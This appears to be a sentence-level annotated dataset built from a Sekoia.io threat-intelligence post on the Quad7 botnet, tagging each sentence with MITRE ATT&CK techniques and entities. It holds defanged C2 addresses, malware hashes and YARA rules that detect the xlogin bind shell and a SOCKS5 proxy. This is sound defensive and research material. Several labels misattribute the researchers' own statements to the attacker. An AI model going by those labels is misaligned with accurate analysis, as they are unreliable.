"uid": "mitre-98_mitre_report-p1-s108-7eb094", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "This suggests that a list of passwords is being tested on each account (password spraying), rather than credential pairs obtained from data breaches (credential stuffing).", "sentence_text": "In the dataset of Sekoia.io XDR customers, 27% of organisations (Entra ID tenants) were targeted over the last 30 days .", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "Targets 27% of organizations in Sekoia.io XDR customer base", "entities": [ { "text": "Sekoia.io XDR customers", "start": 18, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "27% of organisations (Entra ID tenants) were targeted ", "start": 43, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "Entra ID tenants", "start": 65, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s109-347cba", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "In the dataset of Sekoia.io XDR customers, 27% of organisations (Entra ID tenants) were targeted over the last 30 days .", "sentence_text": "The list of targeted email addresses evolves over time, with new addresses being added to or removed from the list.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589.002", "name": "Email Addresses" } ], "procedure": "Dynamically updates target email list for password spraying campaigns", "entities": [ { "text": "list of targeted email addresses evolves over time", "start": 4, "end": 54, "label": "Action" }, { "text": "new addresses being added to or removed from the list.", "start": 61, "end": 115, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s110-dc4703", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "The list of targeted email addresses evolves over time, with new addresses being added to or removed from the list.", "sentence_text": "Therefore,\nthe threat actor behind the Quad7 botnet does not appear to be an APT but more likely cybercriminals looking to carry out business email compromise via password spraying from compromised SOHO routers After this investigation, some mysteries remain.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Conducts business email compromise via password spraying from SOHO routers", "entities": [ { "text": "threat actor", "start": 15, "end": 27, "label": "ThreatActor" }, { "text": "the Quad7", "start": 35, "end": 44, "label": "ThreatActor" }, { "text": "business email compromise", "start": 133, "end": 158, "label": "Action" }, { "text": "password spraying", "start": 163, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "compromised SOHO routers", "start": 186, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s111-e1963e", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "Therefore,\nthe threat actor behind the Quad7 botnet does not appear to be an APT but more likely cybercriminals looking to carry out business email compromise via password spraying from compromised SOHO routers After this investigation, some mysteries remain.", "sentence_text": "The primary mystery of this investigation remains the attribution question .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s112-c477d0", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "The primary mystery of this investigation remains the attribution question .", "sentence_text": "Many speculations have been made in open-source discussions, suggesting it could be another Chinese IoT botnet or a North Korean campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s113-208920", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "Many speculations have been made in open-source discussions, suggesting it could be another Chinese IoT botnet or a North Korean campaign.", "sentence_text": "Their binaries are stripped and only one is really custom, the xlogin shell.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses stripped binaries with custom xlogin shell for persistence", "entities": [ { "text": "binaries are stripped ", "start": 6, "end": 28, "label": "Action" }, { "text": " custom", "start": 50, "end": 57, "label": "Action" }, { "text": "xlogin shell.", "start": 63, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s114-5488c1", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Their binaries are stripped and only one is really custom, the xlogin shell.", "sentence_text": "Regarding the infrastructure, we found only one interesting match with a C2 related to GobRAT – another notable IoT botnet first disclosed by the JP-CERT – next to one of the Quad7 botnet operators’ IP addresses.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Shares infrastructure proximity with GobRAT IoT botnet C2", "entities": [ { "text": " C2 related to GobRAT", "start": 72, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "IoT botnet", "start": 112, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "JP-CERT", "start": 146, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "Quad7 botnet operators’ IP addresses.", "start": 175, "end": 212, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s115-7100a7", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "Regarding the infrastructure, we found only one interesting match with a C2 related to GobRAT – another notable IoT botnet first disclosed by the JP-CERT – next to one of the Quad7 botnet operators’ IP addresses.", "sentence_text": "However, this is a very weak link as GobRAT and the other implants dropped by the same threat actor are modular and way more sophisticated than a simple bind shell with a socks proxy.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.002", "name": "External Proxy" } ], "procedure": "Threat actor deploys modular implants, including GobRAT, which are more advanced than a simple bind shell using a SOCKS proxy.", "entities": [ { "text": "threat actor", "start": 87, "end": 99, "label": "ThreatActor" }, { "text": "GobRAT", "start": 37, "end": 43, "label": "MalwareTool" }, { "text": " socks proxy", "start": 170, "end": 182, "label": "Infrastructure_Indicator" }, { "text": " dropped by", "start": 66, "end": 77, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s116-f1bf75", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "However, this is a very weak link as GobRAT and the other implants dropped by the same threat actor are modular and way more sophisticated than a simple bind shell with a socks proxy.", "sentence_text": "The second mystery is the exploited vulnerabilities used to compromise these routers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s117-9c2bb7", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "The second mystery is the exploited vulnerabilities used to compromise these routers.", "sentence_text": "We are almost certain that the attackers had an authentication bypass leading to an RCE or an unauthenticated RCE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s118-20ddaa", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 118, "context_before": "We are almost certain that the attackers had an authentication bypass leading to an RCE or an unauthenticated RCE.", "sentence_text": "As TP-Link reused almost the same firmware codebase between some router series – you can see that with WR841N related files on the Archer C7 directory listing screenshot – it is likely possible that the attackers are using only one exploit chain that affects all routers.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Exploits shared firmware codebase across multiple TP-Link router models", "entities": [ { "text": "TP-Link", "start": 3, "end": 10, "label": "Infrastructure_Indicator" }, { "text": "firmware codebase", "start": 34, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "WR841N", "start": 103, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "Archer C7 ", "start": 131, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "one exploit chain that affects all routers.", "start": 228, "end": 271, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s119-ae212c", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 119, "context_before": "As TP-Link reused almost the same firmware codebase between some router series – you can see that with WR841N related files on the Archer C7 directory listing screenshot – it is likely possible that the attackers are using only one exploit chain that affects all routers.", "sentence_text": "The last remaining mystery is the geographical distribution of this botnet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s120-6ef50d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "The last remaining mystery is the geographical distribution of this botnet.", "sentence_text": "Initially, we thought that it might be due to default passwords set by internet providers in specific countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s121-661238", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 121, "context_before": "Initially, we thought that it might be due to default passwords set by internet providers in specific countries.", "sentence_text": "However, we are confident that the operators behind the Quad7 botnet are not doing brute-forcing attacks against the router’s management interface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s122-985f18", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "However, we are confident that the operators behind the Quad7 botnet are not doing brute-forcing attacks against the router’s management interface.", "sentence_text": "Therefore, this mystery remains unsolved.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s123-81960d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 123, "context_before": "Therefore, this mystery remains unsolved.", "sentence_text": "It is important to remember that our investigation was limited to one router and one week of monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s124-1b82d9", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "It is important to remember that our investigation was limited to one router and one week of monitoring.", "sentence_text": "Threats targeting edge devices: an unseen but prevalent danger The Quad7 botnet operators made various mistakes, allowing the community to identify the compromised routers through internet scanners.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates botnet with detectable infrastructure allowing identification via internet scanners", "entities": [ { "text": "The Quad7 botnet", "start": 63, "end": 79, "label": "ThreatActor" }, { "text": "made various mistakes", "start": 90, "end": 111, "label": "Action" }, { "text": "allowing the community to identify the compromised routers through internet scanners", "start": 113, "end": 197, "label": "Action" }, { "text": "compromised routers", "start": 152, "end": 171, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s125-ddbf2c", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 125, "context_before": "Threats targeting edge devices: an unseen but prevalent danger The Quad7 botnet operators made various mistakes, allowing the community to identify the compromised routers through internet scanners.", "sentence_text": "However, the vast majority of threats targeting edge devices remain invisible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s126-022b71", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 126, "context_before": "However, the vast majority of threats targeting edge devices remain invisible.", "sentence_text": "Therefore, we encourage restricting the remote administration of these devices to specific IP addresses to prevent the exploitation of vulnerabilities and ensure your devices are updated with the latest firmware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s127-80b84c", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "Therefore, we encourage restricting the remote administration of these devices to specific IP addresses to prevent the exploitation of vulnerabilities and ensure your devices are updated with the latest firmware.", "sentence_text": "Consequently, we recommend deploying specific rules to monitor authentication attempts against internal servers originating from these edge devices’ IP addresses and other unmonitored devices inside your network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s128-0e5638", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "Consequently, we recommend deploying specific rules to monitor authentication attempts against internal servers originating from these edge devices’ IP addresses and other unmonitored devices inside your network.", "sentence_text": "Detection Bonus:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s129-aff0a7", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "Detection Bonus:", "sentence_text": "Advice for MSSP to hunt for Quad7 O365 targeting.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Targets Microsoft 365 (O365) accounts for credential attacks", "entities": [ { "text": " Quad7", "start": 27, "end": 33, "label": "ThreatActor" }, { "text": "O365 ", "start": 34, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "targeting.", "start": 39, "end": 49, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s130-db03c9", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "Advice for MSSP to hunt for Quad7 O365 targeting.", "sentence_text": "The authentication attempts performed via the Quad7 botnet botnet feature a fairly unique combination of attributes that make them easily identifiable in the Entra ID Sign-in log or Microsoft 365 audit log:\nUser-Agent is either:\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Application ID:\n1950a258-227b-4e31-a9cf-717495945fc2\n(Microsoft Azure PowerShell)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Uses specific User-Agents and Azure PowerShell Application ID for O365 authentication", "entities": [ { "text": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "start": 229, "end": 298, "label": "Infrastructure_Indicator" }, { "text": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36", "start": 299, "end": 414, "label": "Infrastructure_Indicator" }, { "text": "1950a258-227b-4e31-a9cf-717495945fc2", "start": 431, "end": 467, "label": "Infrastructure_Indicator" }, { "text": "Microsoft 365 audit log:", "start": 182, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s131-45babf", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "The authentication attempts performed via the Quad7 botnet botnet feature a fairly unique combination of attributes that make them easily identifiable in the Entra ID Sign-in log or Microsoft 365 audit log:\nUser-Agent is either:\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Application ID:\n1950a258-227b-4e31-a9cf-717495945fc2\n(Microsoft Azure PowerShell)", "sentence_text": "\nIt is possible to confirm that the request originated from the botnet by looking up the source IP address in a tool like Censys or Shodan to confirm the presence of the “xlogin:” banner on port 7777.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Verifies botnet source IPs via xlogin banner on port 7777 in internet scanners", "entities": [ { "text": "source IP address", "start": 96, "end": 113, "label": "Action" }, { "text": " Censys", "start": 128, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "Shodan ", "start": 139, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "“xlogin:” banner", "start": 177, "end": 193, "label": "Infrastructure_Indicator" }, { "text": "port 7777.", "start": 197, "end": 207, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s132-2c1f3a", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "\nIt is possible to confirm that the request originated from the botnet by looking up the source IP address in a tool like Censys or Shodan to confirm the presence of the “xlogin:” banner on port 7777.", "sentence_text": "In the dataset of logs available to Sekoia.io, over 98% of the authentication attempts identified by this heuristic can be conclusively attributed to the Quad7 botnet.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Conducts authentication attempts with 98% accuracy via unique heuristic signatures", "entities": [ { "text": "Sekoia.io", "start": 36, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "98% of the authentication attempts", "start": 52, "end": 86, "label": "Action" }, { "text": " conclusively attributed to the Quad7 botnet.", "start": 122, "end": 167, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s133-d998ab", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "In the dataset of logs available to Sekoia.io, over 98% of the authentication attempts identified by this heuristic can be conclusively attributed to the Quad7 botnet.", "sentence_text": "This query should return almost exclusively authentication failures, with the most common error codes being:\n: Invalid username or password : Account locked : Account disabled Authentication attempts resulting in other status codes should be investigated to determine if the account’s password was discovered.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Generates authentication failures with specific error codes during password spraying", "entities": [ { "text": "authentication failures", "start": 44, "end": 67, "label": "Action" }, { "text": " Account locked ", "start": 141, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "Account disabled", "start": 159, "end": 175, "label": "Infrastructure_Indicator" }, { "text": " Invalid username or password", "start": 110, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s134-07bd94", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": "This query should return almost exclusively authentication failures, with the most common error codes being:\n: Invalid username or password : Account locked : Account disabled Authentication attempts resulting in other status codes should be investigated to determine if the account’s password was discovered.", "sentence_text": "When the logs indicate that the authentication was blocked by multi-factor authentication or conditional access policies, the password should be considered compromised, as these verifications only occur after a correct password was submitted.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Successfully compromises passwords when blocked by MFA or conditional access", "entities": [ { "text": "authentication was blocked by multi-factor authentication", "start": 32, "end": 89, "label": "Action" }, { "text": "password should be considered compromised", "start": 126, "end": 167, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s135-bbcddc", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "When the logs indicate that the authentication was blocked by multi-factor authentication or conditional access policies, the password should be considered compromised, as these verifications only occur after a correct password was submitted.", "sentence_text": "Identifying these authentication logs can help assess how an organisation is targeted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s136-16b435", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "Identifying these authentication logs can help assess how an organisation is targeted.", "sentence_text": "Thank you for reading this blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s137-bfcfc6", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "Thank you for reading this blog post.", "sentence_text": "Please don’t hesitate to provide your feedback on our publications by clicking here .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s138-5c4b6b", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "Please don’t hesitate to provide your feedback on our publications by clicking here .", "sentence_text": "You can also contact us at tdr[at]sekoia.io for further discussions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s139-f30839", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "You can also contact us at tdr[at]sekoia.io for further discussions.", "sentence_text": "Quad7 Botnet Indicators of compromise Some IOCs & samples aren’t shared publicly.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Maintains private IOCs and malware samples for operational security", "entities": [ { "text": "Quad7 Botnet", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "IOCs & samples", "start": 43, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "aren’t shared publicly.", "start": 58, "end": 81, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s140-11d44d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 140, "context_before": "Quad7 Botnet Indicators of compromise Some IOCs & samples aren’t shared publicly.", "sentence_text": "If you are a national CERT or LEA, we can share the IOCs and the samples with you under TLP:AMBER+STRICT as they contain hardcoded passwords leading to remote shell execution on the compromised routers.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Contains hardcoded passwords enabling remote shell execution on routers", "entities": [ { "text": "hardcoded passwords", "start": 121, "end": 140, "label": "Infrastructure_Indicator" }, { "text": "compromised routers.", "start": 182, "end": 202, "label": "Infrastructure_Indicator" }, { "text": "remote shell execution", "start": 152, "end": 174, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s141-11a99d", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "If you are a national CERT or LEA, we can share the IOCs and the samples with you under TLP:AMBER+STRICT as they contain hardcoded passwords leading to remote shell execution on the compromised routers.", "sentence_text": "Please contact tdr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s142-0f2300", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "Please contact tdr", "sentence_text": "[ at ] sekoia [ dot ] io Infrastructure 142.11.205[.]164 23.254.201[.]175 151.236.20[.]185 151.236.20[.]211 [TFTP SERVER: on demand]\nMalware\n98d3764862b182417c910a96e0fbfe71 init.sh\nc8e229bed1659f1613c1016b3345ef08 microsocks\n29e6df5bb30ed8fd12c09d9b6890ab4f socks5\n69ced04a2ec895084d3aab1086216d32 xlogin\nYara rules\nrule unknown_7777_xlogin { meta:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates C2 infrastructure and deploys malware with specific hashes", "entities": [ { "text": "142.11.205[.]164", "start": 40, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "23.254.201[.]175", "start": 57, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "151.236.20[.]185", "start": 74, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "151.236.20[.]211", "start": 91, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "TFTP SERVER", "start": 109, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "init.sh", "start": 174, "end": 181, "label": "MalwareTool" }, { "text": "98d3764862b182417c910a96e0fbfe71", "start": 141, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "c8e229bed1659f1613c1016b3345ef08", "start": 182, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "29e6df5bb30ed8fd12c09d9b6890ab4f", "start": 226, "end": 258, "label": "Infrastructure_Indicator" }, { "text": "69ced04a2ec895084d3aab1086216d32", "start": 266, "end": 298, "label": "Infrastructure_Indicator" }, { "text": "microsocks", "start": 215, "end": 225, "label": "MalwareTool" }, { "text": "socks5", "start": 259, "end": 265, "label": "MalwareTool" }, { "text": "xlogin", "start": 299, "end": 305, "label": "MalwareTool" } ] }, { "uid": "mitre-98_mitre_report-p1-s143-15084b", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "[ at ] sekoia [ dot ] io Infrastructure 142.11.205[.]164 23.254.201[.]175 151.236.20[.]185 151.236.20[.]211 [TFTP SERVER: on demand]\nMalware\n98d3764862b182417c910a96e0fbfe71 init.sh\nc8e229bed1659f1613c1016b3345ef08 microsocks\n29e6df5bb30ed8fd12c09d9b6890ab4f socks5\n69ced04a2ec895084d3aab1086216d32 xlogin\nYara rules\nrule unknown_7777_xlogin { meta:", "sentence_text": "id = \"01510244-0795-4299-aa66-056a2b4682e7\" version = \"1.0\" intrusion_set = \"Quad7 Botnet\" malware = \"xlogin\" description = \"Detects the xlogin bind shell\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"69ced04a2ec895084d3aab1086216d32\" strings:\n$ = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e } $ = { 2F 64 65 76 2F 6E 75 6C 6C 00 00 00", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deploys xlogin bind shell with specific binary signatures", "entities": [ { "text": "\"xlogin\"", "start": 101, "end": 109, "label": "MalwareTool" }, { "text": "69ced04a2ec895084d3aab1086216d32", "start": 243, "end": 275, "label": "Infrastructure_Indicator" }, { "text": "2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e", "start": 292, "end": 345, "label": "Infrastructure_Indicator" }, { "text": "2F 64 65 76 2F 6E 75 6C 6C 00 00 00", "start": 354, "end": 389, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s144-a1529b", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "id = \"01510244-0795-4299-aa66-056a2b4682e7\" version = \"1.0\" intrusion_set = \"Quad7 Botnet\" malware = \"xlogin\" description = \"Detects the xlogin bind shell\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"69ced04a2ec895084d3aab1086216d32\" strings:\n$ = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e } $ = { 2F 64 65 76 2F 6E 75 6C 6C 00 00 00", "sentence_text": "2D 63 } condition:\nuint32be(0)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses specific binary patterns for xlogin detection", "entities": [ { "text": "uint32be(0)", "start": 19, "end": 30, "label": "Action" }, { "text": "2D 63", "start": 0, "end": 5, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s145-2f01bb", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "2D 63 } condition:\nuint32be(0)", "sentence_text": "== 0x7f454c46 and filesize < 100KB and all of them } rule tool_bhhbazinga_Sock5_strings { meta:\nid = \"45dafe1e-81bb-4202-93ab-fcd46e8d8d6b\" version = \"1.0\" tool = \"bhhbazinga sock5\" description = \"Detects the sock5 project developed by bhhbazinga\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"29e6df5bb30ed8fd12c09d9b6890ab4f\" strings:\n$ = \"tunnel_read_handle\" $ = \"tunnel_write_handle\" $ = \"tunnel_open_handle\" $ = \"tunnel_auth_handle\" $ = \"tunnel_connect_to_remote\" $ = \"tunnel_request_handle\" $ = \"-u : username\" $ = \"-k : password\" $ = \"d : backgroud\" condition:\nuint32be(0)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Uses modified bhhbazinga Sock5 proxy with authentication and tunneling capabilities", "entities": [ { "text": "bhhbazinga sock5", "start": 167, "end": 183, "label": "MalwareTool" }, { "text": "29e6df5bb30ed8fd12c09d9b6890ab4f", "start": 338, "end": 370, "label": "Infrastructure_Indicator" }, { "text": "tunnel_read_handle", "start": 386, "end": 404, "label": "Infrastructure_Indicator" }, { "text": "tunnel_write_handle", "start": 411, "end": 430, "label": "Infrastructure_Indicator" }, { "text": "tunnel_open_handle", "start": 437, "end": 455, "label": "Infrastructure_Indicator" }, { "text": "tunnel_auth_handle", "start": 462, "end": 480, "label": "Infrastructure_Indicator" }, { "text": "tunnel_connect_to_remote", "start": 487, "end": 511, "label": "Infrastructure_Indicator" }, { "text": "tunnel_request_handle", "start": 518, "end": 539, "label": "Infrastructure_Indicator" }, { "text": "-u : username", "start": 546, "end": 569, "label": "Infrastructure_Indicator" }, { "text": "-k : password", "start": 576, "end": 599, "label": "Infrastructure_Indicator" }, { "text": "d : backgroud", "start": 606, "end": 629, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s146-095f15", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "== 0x7f454c46 and filesize < 100KB and all of them } rule tool_bhhbazinga_Sock5_strings { meta:\nid = \"45dafe1e-81bb-4202-93ab-fcd46e8d8d6b\" version = \"1.0\" tool = \"bhhbazinga sock5\" description = \"Detects the sock5 project developed by bhhbazinga\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"29e6df5bb30ed8fd12c09d9b6890ab4f\" strings:\n$ = \"tunnel_read_handle\" $ = \"tunnel_write_handle\" $ = \"tunnel_open_handle\" $ = \"tunnel_auth_handle\" $ = \"tunnel_connect_to_remote\" $ = \"tunnel_request_handle\" $ = \"-u : username\" $ = 